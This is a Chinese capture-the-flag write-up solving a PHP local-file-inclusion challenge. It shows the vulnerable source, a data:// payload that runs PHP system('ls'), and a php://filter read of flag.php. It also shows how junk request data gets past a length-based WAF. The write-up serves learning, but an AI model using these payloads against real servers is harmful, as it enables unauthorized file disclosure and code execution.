NSS [鹏城杯 2022]简单包含

简介: NSS [鹏城杯 2022]简单包含

NSS [鹏城杯 2022]简单包含

看代码觉得不就直接post flag=data://text/plain,<?php system('ls');?>行了。

但是事实上没有什么软用。

用了php://伪协议之后发现有WAF

可以读源码

解码得到

<?php

$path = $_POST["flag"];

if (strlen(file_get_contents('php://input')) < 800 && preg_match('/flag/', $path)) {

  echo 'nssctf waf!';

} else {

  @include($path);

}
?>
    
<code><span style="color: #000000">

<span style="color: #0000BB"><?php <br />highlight_file</span><span style="color: #007700">(</span><span style="color: #0000BB">__FILE__</span><span style="color: #007700">);<br />include(</span><span style="color: #0000BB">$_POST</span><span style="color: #007700">[</span><span style="color: #DD0000">"flag"</span><span style="color: #007700">]);<br /></span><span style="color: #FF8000">//flag in /var/www/html/flag.php;</span>

</span>

</code><br />

绕过方法1:

多加脏数据

绕过方法2:

换个方法加脏数据

这里好奇怪,我postman不行,火狐hackbar可以。是因为火狐hackerbar会自动url编码一次!!!

绕过方法3:

还是脏数据

a=好多个a

&flag=php://filter/read=convert.base64-encode/resource=/var/www/html/flag.php

绕过方法4:

日志包含

测不出东西。但是可以看报文,是阿帕奇服务器。

这里应该是NSS的原因,没开相关权限,不能日志包含。

目录
相关文章
|
安全 数据安全/隐私保护
陇剑杯WP - Webshell详细题解
陇剑杯WP - Webshell详细题解
988 0
|
SQL 安全 关系型数据库
Sqlmap2021 -- Referer注入
Sqlmap2021 -- Referer注入
416 1
|
SQL 监控 druid
Druid未授权访问 漏洞复现
Druid未授权访问 漏洞复现
19590 0
|
应用服务中间件 PHP nginx
NSS [HNCTF 2022 WEEK2]easy_include
NSS [HNCTF 2022 WEEK2]easy_include
242 0
NSS [SWPUCTF 2021 新生赛]pop
NSS [SWPUCTF 2021 新生赛]pop
215 0
|
JSON 开发框架 网络安全
[网络安全] Dirsearch 工具的安装、使用详细教程
[网络安全] Dirsearch 工具的安装、使用详细教程
9531 0
|
PHP
CTFSHOW 每周大挑战 RCE极限挑战
CTFSHOW 每周大挑战 RCE极限挑战
304 0
|
安全 Shell Linux
Webshell管理工具:AntSword(中国蚁剑)
中国蚁剑的下载、安装、详细使用步骤
7714 1
NSS [SWPUCTF 2022 新生赛]where_am_i
NSS [SWPUCTF 2022 新生赛]where_am_i
222 0
|
Ubuntu 网络协议 Linux
在Linux中,如何检查和配置IP地址?
在Linux中,如何检查和配置IP地址?